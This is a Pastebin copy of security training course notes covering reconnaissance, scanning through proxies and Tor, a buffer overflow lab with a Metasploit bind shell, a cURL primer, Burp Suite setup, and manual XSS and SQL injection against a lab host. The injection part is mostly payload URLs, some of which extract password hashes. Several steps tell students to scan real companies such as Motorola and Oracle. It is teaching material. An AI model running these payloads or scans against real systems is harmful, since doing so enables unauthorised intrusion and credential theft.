Advertisement
joemccray

Norway Ultimate AppSec

Sep 3rd, 2016
2,932
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ####################
  2. # Ultimate App Sec #
  3. ####################
  4. Please use the link below to request access to the online course development environment:
  5. https://goo.gl/forms/8dsJTT8tY5PLdMVx1
  6.  
  7. Download the course slides:
  8. https://s3.amazonaws.com/StrategicSec-Files/UltimateAppSec/UltimateAppSec-Week1.pptx
  9. http://www.slideshare.net/akilan27/ilugc-curl
  10. http://www.slideshare.net/cory_scott/tactical-application-security-getting-stuff-done-black-hat-briefings-2015
  11.  
  12.  
  13. Download the course lab manual:
  14. https://s3.amazonaws.com/StrategicSec-Files/UltimateAppSec/Ultimate-App-Sec-V2.pdf
  15.  
  16.  
  17.  
  18. #########################
  19. # More Course Materials #
  20. #########################
  21.  
  22. Slides:
  23. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/WebAppSecIsNotEasyButCanBeSimple.pptx
  24. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/Burp+Suite.pptx
  25.  
  26.  
  27. Lab Manual:
  28. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/BurpSuite-Bootcamp-v1.pdf
  29.  
  30.  
  31.  
  32. ##########
  33. # VMWare #
  34. ##########
  35. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  36.  
  37. - A 30-day trial of Workstation 11 can be downloaded from here:
  38. - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0
  39.  
  40. - A 30-day trial of Fusion 7 can be downloaded from here:
  41. - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0
  42.  
  43. - The newest version of VMWare Player can be downloaded from here:
  44. - https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0
  45.  
  46.  
  47. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  48.  
  49.  
  50. ##########################
  51. # Download the attack VM #
  52. ##########################
  53. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  54. user: strategicsec
  55. pass: strategicsec
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67. ----------------------------------------------Attacking a large company----------------------------------------------
  68.  
  69.  
  70. Day 1 Intro to Security: Attacking a large company:
  71.  
  72.  
  73. ####################
  74. # Passive Scanning #
  75. ####################
  76.  
  77. Pick a REALLY large company to attack (like HSBC similar multi-billion dollar/multi-national organization).
  78.  
  79.  
  80. Look that entity up in the following places:
  81. - Wikipedia
  82. - Robtex
  83. - Netcraft
  84. - FF Passive Recon
  85.  
  86. - Wikipedia Page
  87. - Are they Public or Private?
  88. - Does the target have any subsidiaries?
  89.  
  90. - Robtex
  91. - Show system map
  92.  
  93. - Netcraft
  94. - http://toolbar.netcraft.com/site_report
  95.  
  96. - Passive Recon (Firefox Add-on)
  97. - https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104. At the end of this you should know enough to be able to generate a document similar to my OSINT_Innophos_11242010.doc
  105.  
  106.  
  107. - Example OSINT Report to review:
  108. - https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc
  109.  
  110.  
  111. Read this OSINT_Innophos_11242010.doc --OUT LOUD-- and call out interesting information that you find.
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122. ###################################################
  123. # Day 1: Identifying External Security Mechanisms #
  124. ###################################################
  125. -- Boot up the StrategicSec VM, log into it with Putty and execute the following commands:
  126.  
  127.  
  128.  
  129.  
  130. sudo /sbin/iptables -F
  131. strategicsec
  132.  
  133. cd /home/strategicsec/toolz
  134.  
  135.  
  136.  
  137. ###########################
  138. # Target IP Determination #
  139. ###########################
  140.  
  141. perl blindcrawl.pl -d motorola.com
  142.  
  143. -- Take each IP address and look ip up here:
  144. http://www.networksolutions.com/whois/index.jsp
  145.  
  146.  
  147. Zone Transfer fails on most domains, but here is an example of one that works:
  148. dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
  149.  
  150.  
  151. cd ~/toolz/
  152. ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
  153.  
  154.  
  155. sudo nmap -sL 148.87.1.0-255
  156. strategicsec
  157.  
  158. sudo nmap -sL 148.87.1.0-255 | grep oracle
  159. strategicsec
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166. ###########################
  167. # Load Balancer Detection #
  168. ###########################
  169.  
  170. Here are some options to use for identifying load balancers:
  171. - http://toolbar.netcraft.com/site_report
  172. - https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
  173.  
  174.  
  175. Here are some command-line options to use for identifying load balancers:
  176.  
  177. dig microsoft.com
  178.  
  179. cd ~/toolz
  180. ./lbd-0.1.sh microsoft.com
  181.  
  182.  
  183. halberd microsoft.com
  184. halberd motorola.com
  185. halberd oracle.com
  186.  
  187.  
  188.  
  189. ######################################
  190. # Web Application Firewall Detection #
  191. ######################################
  192.  
  193. cd ~/toolz/wafw00f
  194. python wafw00f.py http://www.oracle.com
  195. python wafw00f.py http://www.strategicsec.com
  196.  
  197.  
  198. cd ~/toolz/
  199. sudo nmap -p 80 --script http-waf-detect.nse oracle.com
  200. strategicsec
  201.  
  202. sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov
  203. strategicsec
  204.  
  205.  
  206.  
  207. ########################
  208. # Scanning Methodology #
  209. ########################
  210.  
  211. - Ping Sweep
  212. What's alive?
  213. ------------
  214. sudo nmap -sP 157.166.226.*
  215. strategicsec
  216.  
  217. -if -SP yields no results try:
  218. sudo nmap -sL 157.166.226.*
  219. strategicsec
  220.  
  221. - Port Scan
  222. What's where?
  223. ------------
  224. sudo nmap -sS 162.243.126.247
  225. strategicsec
  226.  
  227.  
  228. - Bannergrab/Version Query
  229. What versions of software are running
  230. -------------------------------------
  231. sudo nmap -sV 162.243.126.247
  232. strategicsec
  233.  
  234.  
  235. - Vulnerability Research
  236. Lookup the banner versions for public exploits
  237. ----------------------------------------------
  238. http://exploit-db.com
  239. http://securityfocus.com/bid
  240. https://packetstormsecurity.com/files/tags/exploit/
  241.  
  242.  
  243.  
  244. #######################################################
  245. # Day 1: 3rd Party Scanning, and scanning via proxies #
  246. #######################################################
  247.  
  248. https://www.shodan.io/
  249.  
  250. Create a FREE account and login
  251.  
  252. net:129.188.8.0/24
  253.  
  254.  
  255.  
  256. cd /home/strategicsec/toolz/
  257. perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
  258.  
  259.  
  260.  
  261. sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 9050
  262. strategicsec
  263.  
  264.  
  265.  
  266.  
  267. ----------------------------------------------------------------------
  268. vi ~/toolz/fix-proxychains-dns.sh
  269.  
  270. #!/bin/bash
  271. # This script is called by proxychains to resolve DNS names
  272. # DNS server used to resolve names
  273. # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
  274. DNS_SERVER=4.2.2.2
  275.  
  276. if [ $# = 0 ] ; then
  277. echo " usage:"
  278. echo " proxyresolv <hostname> "
  279. exit
  280. fi
  281.  
  282. export LD_PRELOAD=libproxychains.so.3
  283. dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
  284. -----------------------------------------------------------------------
  285.  
  286.  
  287. sudo ntpdate pool.ntp.org
  288. strategicsec
  289.  
  290. tor-resolve strategicsec.com
  291.  
  292. proxychains nmap -sT -p80 204.244.123.113
  293.  
  294. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 204.244.123.113
  295.  
  296.  
  297. #####################################
  298. # Quick Stack Based Buffer Overflow #
  299. #####################################
  300.  
  301. - You can download everything you need for this exercise from the link below
  302. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  303. https://nmap.org/dist/nmap-7.12-setup.exe
  304.  
  305. - Extract this zip file to your Desktop
  306.  
  307. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  308.  
  309. - Open a new command prompt and type:
  310. ncat 127.0.0.1 9999
  311.  
  312. - In the new command prompt window where you ran ncat type:
  313. HELP
  314.  
  315. - Go to folder C:\Users\student\student\ExploitLab\4-AttackScripts
  316. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  317.  
  318. - Now double-click on 1-simplefuzzer.py
  319. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  320.  
  321.  
  322. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  323.  
  324. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  325.  
  326. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  327.  
  328. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  329.  
  330. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  331.  
  332. - Calculate the distance to EIP by running script 3-3000chars.py
  333. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  334.  
  335. 4-count-chars-to-EIP.py
  336. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  337. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  338.  
  339. 5-2006char-eip-check.py
  340. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  341.  
  342. 6-jmp-esp.py
  343. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  344.  
  345. 7-first-exploit
  346. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  347.  
  348. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  349.  
  350.  
  351. ------------------------------
  352.  
  353. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  354.  
  355. vi vulnserv.rb (paste the code into this file)
  356.  
  357.  
  358.  
  359. cd ~/toolz/metasploit
  360.  
  361. ./msfconsole
  362.  
  363.  
  364.  
  365. use exploit/windows/misc/vulnserv
  366. set PAYLOAD windows/meterpreter/bind_tcp
  367. set RHOST 192.168.88.129
  368. set RPORT 9999
  369. exploit
  370.  
  371.  
  372.  
  373.  
  374.  
  375.  
  376.  
  377.  
  378.  
  379.  
  380.  
  381. ----------------------------------------------HTTP: The Foundation ----------------------------------------------
  382.  
  383. Introduction to HTTP with cURL
  384.  
  385. Do all of the tasks on http://conqueringthecommandline.com/book/curl starting from section 3.2 to the end of the page.
  386.  
  387.  
  388.  
  389. #############################
  390. # 1. Download a Single File #
  391. #############################
  392. The following command will get the content of the URL and display it in the STDOUT (i.e on your terminal).
  393. $ curl http://strategicsec.com
  394.  
  395. To store the output in a file, you an redirect it as shown below. This will also display some additional download statistics.
  396. $ curl http://strategicsec.com > strategicsec-com.html
  397.  
  398.  
  399. #####################################
  400. # 2. Save the cURL Output to a file #
  401. #####################################
  402. We can save the result of the curl command to a file by using -o/-O options.
  403. • -o (lowercase o) the result will be saved in the filename provided in the command line
  404. • -O (uppercase O) the filename in the URL will be taken and it will be used as the filename to store the result
  405.  
  406. $ curl -o bye.txt http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  407. Now the page hello.txt will be saved in the file named ‘bye.txt’.
  408. You can also note that when running curl with -o option, it displays the progress meter for the download as follows.
  409.  
  410. When you use curl -O (uppercase O), it will save the content in the file named ‘hello.txt’ itself in the local machine.
  411.  
  412. $ curl -O http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  413. Note: When curl has to write the data to the terminal, it disables the Progress Meter, to avoid confusion in printing. We can use ‘>’|’-o’|’-O’ options to move the result to a file.
  414.  
  415. ##################################################
  416. # 3. Follow HTTP Location Headers with -L option #
  417. ##################################################
  418. By default CURL doesn’t follow the HTTP Location headers. It is also termed as Redirects. When a requested web page is moved to another place, then an HTTP Location header will be sent as a Response and it will have where the actual web page is located.
  419. For example, when someone types google.com in the browser from India, it will be automatically redirected to ‘google.co.in’. This is done based on the HTTP Location header as shown below.
  420.  
  421. $ curl --head http://www.strategicsec.com You'll see that you only get the 301
  422.  
  423. $ curl --head -L http://www.strategicsec.com You'll see that you get the 301, and the 200 OK
  424.  
  425. ##########################################
  426. # 4. Continue/Resume a Previous Download #
  427. ##########################################
  428. Using curl -C option, you can continue a download which was stopped already for some reason. This will be helpful when you download large files, and the download got interrupted.
  429. If we say ‘-C -‘, then curl will find from where to start resuming the download. We can also give an offset ‘-C <offset>’. The given offset bytes will be skipped from the beginning for the source file.
  430. Start a big download using curl, and press Ctrl-C to stop it in between the download.
  431.  
  432. $ curl -O http://swreflections.blogspot.com/2015/05/appsec-gaps-between-builders-and.html
  433. ############## 20.1%
  434. Note: -# is used to display a progress bar instead of a progress meter.
  435. Now the above download was stopped at 20.1%. Using “curl -C -“, we can continue the download from where it left off earlier. Now the download continues from 20.1%.
  436.  
  437. curl -C - -O http://swreflections.blogspot.com/2015/05/appsec-gaps-between-builders-and.html
  438. ############### 21.1%
  439.  
  440.  
  441.  
  442. ######################################
  443. # 5. Test for XMLRPC Pingback Vuln #
  444. ######################################
  445. $ curl -D - "strategicsec.com/xmlrpc.php" -H "Content-Type: text/xml" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://dojo.com/</string></value></param></methodcall>'
  446.  
  447.  
  448. ######################################
  449. # 6. Limit the Rate of Data Transfer #
  450. ######################################
  451. You can limit the amount at which the data gets transferred using –limit-rate option. You can specify the maximum transfer rate as argument.
  452. $ curl --limit-rate 1000B -O http://swreflections.blogspot.com/2015/05/appsec-gaps-between-builders-and.html
  453. The above command is limiting the data transfer to 1000 Bytes/second. curl may use higher transfer rate for short span of time. But on an average, it will come around to 1000B/second.
  454.  
  455.  
  456. #########################################################################
  457. # 7. Download a file only if it is modified before/after the given time #
  458. #########################################################################
  459. We can get the files that are modified after a particular time using -z option in curl. This will work for both FTP & HTTP.
  460. $ curl -z 21-Dec-11 http://www.example.com/yy.html
  461.  
  462. The above command will download the yy.html only if it is modified later than the given date and time
  463.  
  464. $ curl -z -21-Dec-11 http://www.example.com/yy.html
  465.  
  466. The above command will download the yy.html, if it is modified before than the given date and time.
  467. Please refer ‘man curl_getdate’ for the various syntax supported for the date expression
  468.  
  469. #######################################
  470. # 8. Pass HTTP Authentication in cURL #
  471. #######################################
  472. Sometime, websites will require a username and password to view the content ( can be done with .htaccess file ). With the help of -u option, we can pass those credentials from cURL to the web server as shown below.
  473.  
  474. $ curl -u username:password URL
  475.  
  476. Note: By default curl uses Basic HTTP Authentication. We can specify other authentication method using –ntlm | –digest.
  477.  
  478. #####################################
  479. # 9. Download Files from FTP server #
  480. #####################################
  481. cURL can also be used to download files from FTP servers. If the given FTP path is a directory, by default it will list the files under the specific directory.
  482. $ curl -u ftpuser:ftppass -O ftp://ftp_server/public_html/xss.php
  483.  
  484. The above command will download the xss.php file from the ftp server and save it in the local directory.
  485. $ curl -u ftpuser:ftppass -O ftp://ftp_server/public_html/
  486.  
  487. Here, the given URL refers to a directory. So cURL will list all the files and directories under the given URL
  488. If you are new to FTP/sFTP, refer ftp sftp tutorial for beginners.
  489.  
  490. ##################################
  491. # 10. List/Download using Ranges #
  492. ##################################
  493. cURL supports ranges to be given in the URL. When a range is given, files matching within the range will be downloaded. It will be helpful to download packages from the FTP mirror sites.
  494. $ curl ftp://ftp.uk.debian.org/debian/pool/main/[a-z]/
  495. The above command will list out all the packages from a-z ranges in the terminal.
  496.  
  497. ##################################
  498. # 11. Upload Files to FTP Server #
  499. ##################################
  500. Curl can also be used to upload files to the FTP server with -T option.
  501. $ curl -u ftpuser:ftppass -T myfile.txt ftp://ftp.testserver.com
  502.  
  503. The above command will upload the file named myfile.txt to the FTP server. You can also upload multiple files at a same time using the range operations.
  504.  
  505.  
  506. $ curl -u ftpuser:ftppass -T "{file1,file2}" ftp://ftp.testserver.com
  507.  
  508. Optionally we can use “.” to get the input from STDIN and transfer to the remote.
  509.  
  510. $ curl -u ftpuser:ftppass -T - ftp://ftp.testserver.com/myfile_1.txt
  511.  
  512. The above command will get the input from the user from Standard Input and save the contents in the ftp server under the name ‘myfile_1.txt’.
  513. You can provide one ‘-T’ for each URL and the pair specifies what to upload where.
  514.  
  515. #######################################################
  516. # 12. More Information using Verbose and Trace Option #
  517. #######################################################
  518. You can get to know what is happening using the -v option. -v option enable the verbose mode and it will print the details
  519.  
  520. curl -v http://strategicsec.com
  521.  
  522. The about command will output the following
  523.  
  524.  
  525. ####################################################
  526. # 13. Get Definition of a Word using DICT Protocol #
  527. ####################################################
  528. You can use cURL to get the definition for a word with the help of DICT protocol. We need to pass a Dictionary Server URL to it.
  529.  
  530. $ curl dict://dict.org/d:bash
  531. The above command will list the meaning for bash as follows jargon "The Jargon File (version 4.4.7, 29 Dec 2003)" foldoc "The Free On-line Dictionary of Computing (26 July 2010)"
  532. easton "Easton's 1Now you can see that it uses “The Collaborative International Dictionary of English”. There are many dictionaries are available. We can list all the dictionaries using
  533.  
  534.  
  535. ####################################
  536. # 14. Use Proxy to Download a File #
  537. ####################################
  538. We can specify cURL to use proxy to do the specific operation using -x option. We need to specify the host and port of the proxy.
  539.  
  540. $ curl -x proxysever.test.com:3128 http://strategicsec.com
  541.  
  542.  
  543. #####################################
  544. # 15. Send Mail using SMTP Protocol #
  545. #####################################
  546. cURL can also be used to send mail using the SMTP protocol. You should specify the from-address, to-address, and the mailserver ip-address as shown below.
  547.  
  548. $ curl --mail-from blah@test.com --mail-rcpt foo@test.com smtp://mailserver.com
  549. Once the above command is entered, it will wait for the user to provide the data to mail. Once you’ve composed your message, type . (period) as the last line, which will send the email immediately.
  550. Subject: Testing
  551. This is a test mail
  552. .
  553.  
  554.  
  555.  
  556. ----------------------------------------------Firefox and Burp Suite ----------------------------------------------
  557.  
  558.  
  559.  
  560. ###########
  561. # Firefox #
  562. ###########
  563. Start with simple Firefox Addons:
  564.  
  565. - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
  566. - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
  567. - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  568. - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  569. - Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  570.  
  571. A good list of web app testing add ons for Firefox:
  572. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
  573.  
  574.  
  575.  
  576.  
  577. #########################
  578. # Setting up Burp Suite #
  579. #########################
  580. Download latest free version of Burp at http://www.portswigger.net/burp/download.html
  581. Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run:
  582.  
  583. java -jar burpsuite_free_v1.6.31.jar
  584.  
  585. - Click the "Proxy" tab
  586. - Click the "Options" sub tab
  587. - Click “Edit” in the “Proxy Listeners” section
  588. - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
  589. - In the same pop up make sure that the bind port is 8080
  590. - In the same pop up select the “Certificate” tab
  591. - Ensure that burp is configured to "generate CA-signed per-host certificates"
  592.  
  593. Open Firefox
  594. - Click "Edit"
  595. - Click “Preferences"
  596. - Click the "Advanced" tab
  597. - Click the "Network" sub tab
  598. - Click the connection "settings" button
  599. - Click "manual proxy configuration"
  600. set it to 127.0.0.1 port 8080
  601. check "Use this proxy server for all protocols"
  602. - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line
  603.  
  604.  
  605. Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
  606.  
  607. Visit any SSL-protected URL.
  608.  
  609. On the “This Connection is Untrusted” screen, click on “Add Exception”
  610. Click "Get Certificate", then click "View".
  611.  
  612. In the “Details” tab, select the root certificate in the tree (PortSwigger CA).
  613.  
  614. Click "Export" and save the certificate as "BurpCert" on the Desktop.
  615.  
  616. Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
  617. Go to Edit | Preferences
  618. Click “Advanced” and go to “Certificates” tab
  619. Click “View Certificates”
  620.  
  621. Click "Import" and select the certificate file that you previously saved.
  622.  
  623. On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".
  624.  
  625. Close all dialogs and restart Firefox
  626.  
  627.  
  628.  
  629.  
  630.  
  631. ##################################
  632. # Basic: Web Application Testing #
  633. ##################################
  634.  
  635. Most people are going to tell you reference the OWASP Testing guide.
  636. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  637.  
  638. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  639.  
  640.  
  641. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  642.  
  643. 1. Does the website talk to a DB?
  644. - Look for parameter passing (ex: site.com/page.php?id=4)
  645. - If yes - try SQL Injection
  646.  
  647. 2. Can I or someone else see what I type?
  648. - If yes - try XSS
  649.  
  650. 3. Does the page reference a file?
  651. - If yes - try LFI/RFI
  652.  
  653. Let's start with some manual testing against 54.213.100.93
  654.  
  655.  
  656. Start here:
  657. http://54.213.100.93/
  658.  
  659.  
  660. There's no parameter passing on the home page so the answer to question 1 is NO.
  661. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  662.  
  663. Try an XSS in the search box on the home page:
  664. <script>alert(123);</script>
  665.  
  666. Doing this gives us the following in the address bar:
  667. http://54.213.100.93/BasicSearch.aspx?Word=<script>alert(123);</script>
  668.  
  669. Ok, so we've verified that there is XSS in the search box.
  670.  
  671. Let's move on to the search box in the left of the page.
  672.  
  673. Let's give the newsletter signup box a shot
  674.  
  675. Moving on to the login page.
  676. http://54.213.100.93/login.aspx
  677.  
  678. I entered a single quote (') for both the user name and the password. I got the following error:
  679.  
  680. -----------------------------------------------------------------
  681. 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  682. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  683.  
  684. Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  685.  
  686. Source Error:
  687.  
  688.  
  689. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  690. Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
  691. Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
  692. Line 115: //String test = xmln.ToString();
  693. Line 116: if (xmln.Count > 0)
  694.  
  695. -----------------------------------------------------------------
  696.  
  697.  
  698. Hmm....System.Xml.XPath.XPathException.....that's not SQL.
  699.  
  700. WTF is this:
  701. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  702.  
  703.  
  704.  
  705.  
  706. In this case you'll have the trap the request with a proxy like:
  707. - Firefox Tamper Data
  708. - Burp Suite http://www.portswigger.net/Burp/proxy.html
  709. - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  710. - Rat Proxy https://code.google.com/p/ratproxy/
  711. - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  712. - Paros http://sourceforge.net/projects/paros/
  713.  
  714.  
  715.  
  716. Let's go back to that page error message.....
  717.  
  718.  
  719. Let's check it out:
  720. http://54.213.100.93/AuthInfo.xml
  721.  
  722. Looks like we found passwords!!!!!!!!!!
  723.  
  724.  
  725. Looks like there no significant new functionality after logging in with the stolen credentials.
  726.  
  727. Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
  728.  
  729.  
  730. http://54.213.100.93/bookdetail.aspx?id=2
  731.  
  732.  
  733. Ok, there is parameter passing (bookdetail.aspx?id=2).
  734.  
  735. The page name is: bookdetail.aspx
  736. The parameter name is: id
  737. The paramber value is: 2
  738.  
  739.  
  740. Let's try throwing a single quote (') in there:
  741.  
  742. http://54.213.100.93/bookdetail.aspx?id=2'
  743.  
  744.  
  745. I get the following error:
  746.  
  747. Unclosed quotation mark after the character string ''.
  748. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  749.  
  750. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  751.  
  752.  
  753.  
  754.  
  755.  
  756.  
  757.  
  758.  
  759.  
  760.  
  761. #############################################################################
  762. # SQL Injection #
  763. # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
  764. #############################################################################
  765.  
  766.  
  767. - Another quick way to test for SQLI is to remove the paramter value
  768.  
  769.  
  770. #############################
  771. # Error-Based SQL Injection #
  772. #############################
  773. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  774. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  775. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  776. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  777. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  778. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  779. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  780. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  781. http://54.213.100.93/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  782.  
  783.  
  784.  
  785.  
  786. #############################
  787. # Union-Based SQL Injection #
  788. #############################
  789. http://54.213.100.93/bookdetail.aspx?id=2 order by 100--
  790. http://54.213.100.93/bookdetail.aspx?id=2 order by 50--
  791. http://54.213.100.93/bookdetail.aspx?id=2 order by 25--
  792. http://54.213.100.93/bookdetail.aspx?id=2 order by 10--
  793. http://54.213.100.93/bookdetail.aspx?id=2 order by 5--
  794. http://54.213.100.93/bookdetail.aspx?id=2 order by 6--
  795. http://54.213.100.93/bookdetail.aspx?id=2 order by 7--
  796. http://54.213.100.93/bookdetail.aspx?id=2 order by 8--
  797. http://54.213.100.93/bookdetail.aspx?id=2 order by 9--
  798. http://54.213.100.93/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  799.  
  800. We are using a union select statement because we are joining the developer's query with one of our own.
  801. Reference:
  802. http://www.techonthenet.com/sql/union.php
  803. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  804. It removes duplicate rows between the various SELECT statements.
  805.  
  806. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  807.  
  808. http://54.213.100.93/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  809.  
  810. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  811.  
  812. http://54.213.100.93/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  813. http://54.213.100.93/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  814. http://54.213.100.93/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  815. http://54.213.100.93/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  816.  
  817.  
  818.  
  819.  
  820.  
  821. - Another way is to see if you can get the backend to perform an arithmetic function
  822. http://54.213.100.93/bookdetail.aspx?id=(2)
  823. http://54.213.100.93/bookdetail.aspx?id=(4-2)
  824. http://54.213.100.93/bookdetail.aspx?id=(4-1)
  825.  
  826.  
  827.  
  828. http://54.213.100.93/bookdetail.aspx?id=2 or 1=1--
  829. http://54.213.100.93/bookdetail.aspx?id=2 or 1=2--
  830. http://54.213.100.93/bookdetail.aspx?id=1*1
  831. http://54.213.100.93/bookdetail.aspx?id=2 or 1 >-1#
  832. http://54.213.100.93/bookdetail.aspx?id=2 or 1<99#
  833. http://54.213.100.93/bookdetail.aspx?id=2 or 1<>1#
  834. http://54.213.100.93/bookdetail.aspx?id=2 or 2 != 3--
  835. http://54.213.100.93/bookdetail.aspx?id=2 &0#
  836.  
  837.  
  838.  
  839.  
  840.  
  841. ###############################
  842. # Blind SQL Injection Testing #
  843. ###############################
  844. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  845.  
  846. 3 - Total Characters
  847. http://54.213.100.93/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  848. http://54.213.100.93/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  849. http://54.213.100.93/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  850.  
  851. Let's go for a quick check to see if it's DBO
  852. http://54.213.100.93/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  853.  
  854. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  855.  
  856. D - 1st Character
